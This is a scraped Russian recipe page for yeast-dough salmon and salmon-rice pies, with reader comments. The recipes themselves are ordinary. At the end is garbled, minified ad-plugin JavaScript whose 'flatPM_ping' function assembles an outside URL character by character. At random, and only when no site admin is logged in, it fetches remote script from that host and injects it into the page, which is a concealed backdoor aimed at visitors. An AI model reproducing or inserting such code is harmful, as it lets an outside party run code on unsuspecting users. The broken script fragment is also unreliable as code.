Дрожжевой пирог с семгой

Закрытый рыбный пирог с сёмгой (очень сочный и нежный)

Рецепт приготовления блюда с фото см. ниже.

Этот чудесный пирожок испекла для нас бабушка Юля, когда приезжала из Иркутска погостить (к слову, бабушка более 30 лет проработала поваром и шеф поваром). Нежный, напитанный соками, ароматный пирог с сёмгой может взять в свой плен любого, кто его попробует. Естественно, для такого пирога нужно завести хорошее домашнее дрожжевое тесто для пирогов и пару часов подождать, пока тесто несколько раз поднимется. Но это ожидание стоит тех минут наслаждения и удовольствия, которое вы и ваша семья получите, вкусив сытного, пышного и воздушного пирога с семгой.

За счёт того, что наш рыбный пирог закрытый — начинка получается очень нежной, а нижняя корочка хорошо напитывается рыбным и луковым соком. Успех такого пирога во многом зависит от приготовленного теста. На мой взгляд, идеальным для рыбного пирога будет тесто, которое используется в рецепте пирога с сомом. Читайте там все тонкости и подробности замешивания дрожжевого пирожкового теста.

Рецепт закрытого пирога с семгой

Итак, для приготовления вкуснейшего рыбного пирога нужно взять:

  1. 1 кг пирожкового домашнего теста;
  2. филе свежей семги 500-700 г;
  3. 2-3 крупные луковицы;
  4. по вкусу соль и черный перец.

Когда тесто на пирог уже подошло, его нужно хорошенько подбить деревянной или силиконовой лопаткой. Теперь займёмся начинкой для пирога. Репчатый лук нужно почистить и нарезать в кольца потоньше. На малом огне с каплей растительного масла нужно размягчить нарезанный лук. Чтобы он стал мягким и прозрачным. Семгу без костей (филе) промыть и нарезать тонкими полосками. Тесто делим на 2 части. Раскатываем с помощью скалки и рук нижний круг.

Выкладываем чуть остывший тёплый лук и кусочки семги, немного солим и перчим черным перцем (он придаст рыбе волшебный аромат). Вторую часть теста раскатаем также в круг и накроем пирог сверху. Из остатков теста можно сделать украшения для пирога в виде листиков, как сделала нам бабушка. Не забудьте сделать пару дырочек в пироге для выхода пара! Оставить пирог на расстойку на 20 минут. Тем временем поставить духовку на разогрев. Выпекать около получаса на 180 градусах, потом ещё минут 10 на самом малом огне. Выключить духовку и оставить пирожок ещё на 3-5 минут постоять в горячей духовке. Вынимаем наш красавец-пирог из духовки и даём минут 15 отдохнуть. Режем кусочками и зовём всех к столу на пышный рыбный пирог с семгой. Приятного аппетита!

Всем интересно Ваше мнение!

Не уходите по-английски!
Чуть ниже есть формы комментариев.

Рекомендую тематические подборки рецептов: пирог русская кухня рыба новые рецепты

Участники моей группы ВКонтакте получают свежие рецепты первыми. Присоединяйся!

5 комментариев

Отзыв написан 1 апреля 2013 в 19:52

Какая нямка! Я обожаю рыбу! Жаль сейчас всего не попробую, ем не всё. А ещё просто пока времени всё не хватает

Комментарий написан 1 апреля 2013 в 20:06

Да, вам сейчас, Ольга, особенная диета нужна

Откомментчено 15 июля 2015 в 21:44

Мои домашние обожают пироги с рыбой. Этот рецепт хороший. Но, хочу сделать дополнение. Это на любителя. Лук я не обжариваю, режу полукольцами и побольше, хорошо разминаю руками и выкладываю поверх рыбы. Затем солю, перчу и сбрызгиваю подсолнечным маслом. Закрываю вторым слоем теста. Не забыть сделать проколы в нескольких местах И-в духовку. Приятного аппетита!

Сообщение написано 9 декабря 2016 в 10:49

Пирог получился очень вкусным тесто слоёное дрожжевое

Комментарий отправлен 9 марта 2019 в 21:26

Я обожаю все что связано с рыбой пироги восхитительные нежные и сочные акакойароматкогдапекутсяжусть

Как приготовить пирог с семгой из дрожжевого теста

Попробуйте приготовить этот очень вкусный пирог с семгой из дрожжевого теста и далее для вас пошаговый рецепт с фото. Если вы еще никогда не делали это замечательное блюдо, то многое потеряли, так как он действительно очень вкусный.

В рецепте я готовлю пирог со свежей семгой, но никто не запрещает вам его сделать с соленой или копченой семгой. Что касается начинки, то и здесь нет строгих правил. Вы можете добавлять различные продукты и сделать пирог с семгой и рисом, или картошкой.

Как сделать пирог с семгой дрожжевой

Для теста

    Молоко – 100 мл. Вода – 100 мл. 1 яйцо Масло подсолнечное – 4 ст.л. Соль – 0.5 ч.л. Сахар – 1 ч.л. Дрожжи – 2 ч.л. Мука – 3.5 – 4 стакана

Для начинки

    Рыба семга – 700 грамм Сыр мягких сортов, сливочный (филадельфия) – 100 грамм Лук репчатый – 1 шт. Лук зеленый – 1 пучок Соль, специи по вкусу

Пошаговый рецепт приготовления дрожжевого пирога с семгой

Пирог этот можно готовить из любого тесто, какое вам больше нравится. Очень вкусно получается если приготовить его со слоеным тестом, но мне захотелось сделать именно дрожжевой пирог. Не смотря на то, что с дрожжевым тестом нужно немного повозиться, я просто обажаю ароматный запах дрожжевого теста.

Сначала сделаем опару, поэтому, высыпаем дрожжи в небольшую, чистую емкость, добавляем к ним немного сахара, заливаем водой и размешиваем. Оставляем пока в теплом месте, чтобы дрожжи полностью растворились и начали работать.

Тем временем, пока дрожжи не начали свою работу, замесим тесто. В отдельную миску разбиваем яйцо, вливаем теплое молоко.

Добавляем соль, немного сахара.

Вливаем растительное масло и хорошо размешиваем.

В жидкую массу добавляем немного муки и замешиваем не очень густое тесто.

Выливаем в тесто дрожжи, размешиваем.

Высыпаем оставшуюся муку небольшими частями и замешиваем тесто. Готовое тесто накрываем полотенцем и ставим в теплое место, чтобы оно подошло.

Пока тесто подходит подготовим рыбную начинку.

Семгу порезать на небольшие кусочки.

Лук измельчить, добавить в рыбу, посолить, поперчить и перемешать.

В рыбу выкладываем сливочный сыр и перемешиваем.

Готовое тесто разделить на 2 части и одну часть раскатать и переложить в форму, которую нужно предварительно смазать маслом.

Выкладываем на тесто начинку с рыбой.

Вторую часть тесто раскатываем и накрываем ей пирог. Лишнее тесто по краям убираем, смазываем поверхность пирога взбитым яйцом и отправляем его в духовку, разогретую до 200С, и выпекаем до готовности, примерно 30 – 40 минут. Готовность пирога проверяем деревянной палочкой.

Когда наш дрожжевой пирог с семгой будет готов, оставляем его немного остыть и после этого можно нарезать на порционные кусочки и подавать к столу, угощать близких людей, гостей.

Похожие записи

Как сделать пирог с рыбой на кефире

Готовим рыбный пирог из слоеного теста

Как испечь пирог с начинкой из риса и рыбы

Пошаговый рецепт приготовления пирога с рисом и яйцом

Пирог с ревенем — пошаговый рецепт с фото

Открытый песочный пирог с повидлом

Ореховый песочный пирог

Куриный пирог с сыром

Дрожжевой пирог с семгой

Хотите приготовить вкусный, сочный и ароматный дрожжевой пирог с семгой на закуску к обеденному столу или к первым блюдам? Этот рецепт – то, что вам нужно.

Ингредиенты

  • 250 гр семги холодного копчения (можно заменить сырой)
  • 3 яйца
  • 200 гр муки
  • 100 мл молока
  • 1 луковица
  • 100 гр твердого сыра
  • 20-30 гр сливочного масла
  • 3 ст.л. оливкового масла (можно заменить любым растительным маслом)
  • 1 ч.л. сухих дрожжей (с горкой)
  • соль, перец по вкусу

Рецепт приготовления блюда в домашних условиях

  1. Семгу порезать маленькими кусочками. Если вы используете сырую рыбу – нужно после измельчения обжарить в 1ст.л. растительного масла на сильном огне, быстро помешивая лопаткой, в течение 2-3 минут.
  2. На сковороде растопить сливочное масло, лук очистить и порезать мелкими кубиками. На сковороде с разогретым сливочным маслом обжарить лук до золотистого цвета (примерно 3-5 минут на слабом огне) и переложить его на салфетку, чтобы избавиться от лишнего жира.
  3. Молоко и яйца желательно вынуть из холодильника за 20-30 минут до начала приготовления теста, чтобы они нагрелись до комнатной температуры.
  4. Яйца взболтать в миске вилкой до однородности с щепоткой соли и перца. Не переставая взбивать яйца, влить тонкой струйкой молоко и оливковое масло.
  5. Муку просеять в отдельную миску вместе с сухими дрожжами, размешать. Помешивая мучную смесь, влить к ней яично-молочную смесь.
  6. Сыр натереть на мелкой терке, смешать с рыбой и жарным луком, подмешать полученную смесь к дрожжевому тесту. Вымешать его ложкой до равномерного распределения ингредиентов и накрыть миску легким полотенцем или пищевой пленкой.
  7. Оставить тесто для пирога с семгой на 30-40 минут в тепле (около 25-30С). Затем разогреть духовку до 200С, форму для выпечки смазать растительным маслом и переложить туда тесто.
  8. Выпекать дрожжевой пирог с семгой примерно 45 минут до румяной золотистой корочки. Вынуть форму, накрыть ее легким полотенцем и оставить на 20-30 минут.
  9. Снять полотенце, аккуратно вынуть пирог на блюдо и подавать к столу. Рыбный пирог вкусный как в теплом, так и в остывшем виде. Приятного аппетита!

Похожие рецепты:

Пирог “Будайская крепость”: рецепт с фото

120 мин. / Средне

Киш с брокколи и вялеными помидорами: рецепт с фото

Картофельный пирог с маком: рецепт с фото

Пирог “Жербо”: рецепт с фото

240 мин. / Средне

Пирог с абрикосовым повидлом: рецепт с фото

Дрожжевой пирог со свеклой, козьим сыром и орехами в духовке: рецепт с фото

Русский пирог с лососем

Рыбные пироги — в традиции русской кухни. Для их выпекания принято использовать жирные сорта рыбы, а королева среди таких — конечно, красная рыба. Традиционно пироги из рыбы в русской кухне делали на дрожжах или из слоеного теста. Хотя сейчас многие хозяйки любят выпекать очень быстрые заливные пироги. Мы же хотим вам предложить классический рецепт русской кухни — дрожжевой закрытый пирог с лососем.

Состав продуктов

Для дрожжевого теста:

  • 250 мл кисломолочного продукта;
  • 2 куриных яйца;
  • 3 ст.л. сахара-песка;
  • щепотка соли;
  • 100 г сливочного масла (можно заменить маргарином);
  • 1 ст.л. растительного масла;
  • 2 ч.л. сухих дрожжей (если у вас свежие — возьмите 30 г);
  • 0,5 кг пшеничной муки.

Для начинки:

  • 0,5 кг филе лосося ( можно заменить другими сортами красной рыбы — горбушей, кетой и др.);
  • 0,5 стакана риса (любого);
  • 1 большая луковица;
  • пучок укропа;
  • соль, перец;
  • сок 1 лимона.

Готовим дрожжевое тесто

Классический рецепт дрожжевого теста начинается с приготовления опары.

1. Смешиваем кисломолочный продукт (в нашем случае — это обычный кисляк, скисшее дома молоко) комнатной температуры с растопленным сливочным маслом, растительным маслом, сахаром, дрожжами.

2. Добавляем небольшую часть муки (буквально пару столовых ложек отбираем от нормы по рецепту) и отставляем в сторону на 15-20 минут. За это время опара должна показать признаки брожения.

Если вы используете свежие дрожжи, засыпьте их сахаром и подождите, пока они расползутся и станут шапочкой. После этого замешивайте так, как описано выше.

3. Когда опара начала бродить, добавляйте оставшуюся по норме муку и отодвигайте тесто на расстойку.

Теперь самое время заняться начинкой.

Готовим начинку

Мы будем готовить наш пирог с лососем и рисом. Некоторые предпочитают отказаться от риса. Однако это не просто наполнитель в составе начинки. Рис играет роль стабилизатора вкуса, а еще в закрытом пироге он становится хорошим барьером между тестом и лососем, впитывая в себя лишний жир.

В результате тесто под лососем не будет мокрым и ползучим, а сам рис, пропитанный рыбьим соком, становится неимоверно вкусным.

Потому мы все -таки настаиваем — лучше готовить пирог с лососем и рисом.

1. Для приготовления начинки рыбу помойте, проверьте на остаточные косточки. Все лишнее удалите. Филе порежьте небольшими произвольными кусочками. Посолите рыбу, поперчите и сбрызните частью свежевыжатого сока лимона. Оставьте помариноваться.

2. Крупную луковицу пошинкуйте тонкими полукольцами и полейте остатком лимонного сока. Оставьте для маринования минут на 20. Можете добавить в маринад щепотку сахара.

3. Рис залейте холодной, слегка подсоленной водой в соотношении три части риса — одна часть воды. То есть если мы берем половину стакана риса, то воды нужно — чуть меньше четверти. Слегка проварите, пока рис не возьмет в себя всю воду. Мы специально взяли воды меньше, чем нужно традиционно для варки риса. Дело в том, что нам для пирога с лососем нужен полусырой рис.

4. Укроп мелко порежьте.

Ингредиенты для начинки готовы.

Собираем пирог

Такой пирог можно делать в традиционной круглой форме. Но мы предлагаем вам попробовать сделать пирог с лососем и рисом в форме рыбы. Поэтому нам понадобится любой большой противень.

1. Тесто, которое к этому времени должно хорошо подойти, еще раз обминаем.

2. Отрежьте от него небольшой кусочек для декора. Остальное тесто, исходя из его размера, раскатайте в виде овала.

3. Положите в центр полосой слой риса. На него укладываем слой маринованного лука.

4. Поверх лука нужно распределить лосось, а на рыбу — порезанный укроп.

5. Слепите края нашего пирога и уложите на смазанный растительным маслом противень швом вниз.

6. Из кусочка теста можно вырезать рыбки, водоросли (полоски теста, разрезанные по краям), к этой композиции можно добавить порезанные кружочками черные маслины без косточек. Разложите вашу красоту по пирогу так, как вам нравится.

7. Взбейте желток с небольшим количеством воды и смажьте наш пирог. Теперь можно ставить это произведение кулинарного искусства в духовой шкаф.

Выпекание

Выпекать пирог с лососем и рисом по рецепту нужно в течение 50 минут в духовом шкафу, разогретом до температуры 180 градусов. Но вы следите за пирогом. Возможно, в вашей духовке он испечется быстрее.

Сигналом о том, что сдоба готова, станет румяная, золотистая корочка пирога.

Полезные советы

Пирог по этому рецепту можно готовить не только закрытый, но и открытый. В этом случае нужно использовать круглую форму, делать его в форме традиционного пирога, а декором покрывать открытую начинку.

Некоторые хозяйки вместо риса используют картофель. В таком случае советуем укладывать слой картофельного пюре, которое лучше приготовить заранее и толочь без добавления молока.

Подавать рыбный пирог нужно в качестве горячей закуски либо к традиционному русскому чаю.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Оцените рецепт ОценитьПрименить